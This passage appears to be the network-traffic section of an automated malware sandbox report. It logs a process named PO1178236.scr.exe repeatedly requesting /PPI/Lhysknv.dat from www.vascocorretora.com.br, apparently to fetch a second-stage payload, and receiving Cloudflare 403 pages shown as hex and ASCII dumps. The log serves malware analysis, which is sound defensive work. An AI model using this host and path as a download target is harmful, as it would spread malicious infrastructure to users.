        2025-01-09 07:37:13 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:37:13 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 63 34 62 62 62 32 33 33 31 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2c4bbb23314</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:37:13 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 63 34 62 62 62 32 33 33 31 34 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4d 79 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2c4bbb23314',t:'MTczNjQwODIzMy4wMDAwMDA=
        2025-01-09 07:37:13 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        126192.168.2.949835188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:14 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:14 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:29 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MGUSCDymIkXvX45biu39eCWens4QvUdboZsprdHgYqHSES1Indg%2F0JankdAVMEhj06zxFAEw%2B319Yr1M0X%2BZfrV2%2FmLIVkdAnAqv%2FJOMtDjyG1giqkFUKXFeI2C4bmQHKcV4KHtEsB62Yflr"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2c87fa1447a-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1557&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1792510&cwnd=232&unsent_bytes=0&cid=7f0c65799833f17d&ts=124&x=0"
        2025-01-09 07:37:14 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:14 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:14 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:14 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 63 38 37 66 61 31 34 34 37 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2c87fa1447a</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:14 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 63 38 37 66 61 31 34 34 37 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2c87fa1447a',t:'MTczNjQwODIzNC4wMDAwMDA='};v
        2025-01-09 07:37:14 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        127192.168.2.949836188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:14 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:14 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:14 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:29 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ydCKu9RBcnfetCr7VaQG9gW%2FsyQe4Ic3bCD3gJPvRb2XUrGOCMq41Mm%2F3SlzckoVwpr2h0kdqTzJk4B2Quf89rrBe72y8RsIqrkRDJdaTIFwwhjIEy8yPUmFbQUtn7dDC%2FFk0vwUgRn5wSj"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2cc4cc45e7c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=2204&rtt_var=846&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1279579&cwnd=196&unsent_bytes=0&cid=e2486fc115397ed0&ts=148&x=0"
        2025-01-09 07:37:14 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:14 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:14 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:14 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 63 63 34 63 63 34 35 65 37 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2cc4cc45e7c</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:14 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 63 63 34 63 63 34 35 65 37 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 7a 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2cc4cc45e7c',t:'MTczNjQwODIzNC4wMDAwMDA='};var a
        2025-01-09 07:37:14 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        128192.168.2.949837188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:15 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:15 UTC999INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:15 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:30 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1Jm1Jzups1LeEK9QSNkxHPrlqArTVqxJJ6gMiJbOv3h3XQgGScebi4QblSckFWsFBSSULJqEsXlI8NAZMBjUmV7MzGnijNRtlp1UyKTn7lsNTfBNdP9O0BRIwiKGifDr7XE12i2L08aqfMH"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2d00f7343bd-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1597&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1793611&cwnd=190&unsent_bytes=0&cid=b06ec608665ab5a5&ts=154&x=0"
        2025-01-09 07:37:15 UTC370INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:15 UTC1369INData Raw: 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64
        Data Ascii: itle><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-wid
        2025-01-09 07:37:15 UTC1369INData Raw: 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63 6f 6e
        Data Ascii: light"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-con
        2025-01-09 07:37:15 UTC1369INData Raw: 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 64 30 30 66 37 33 34 33 62 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 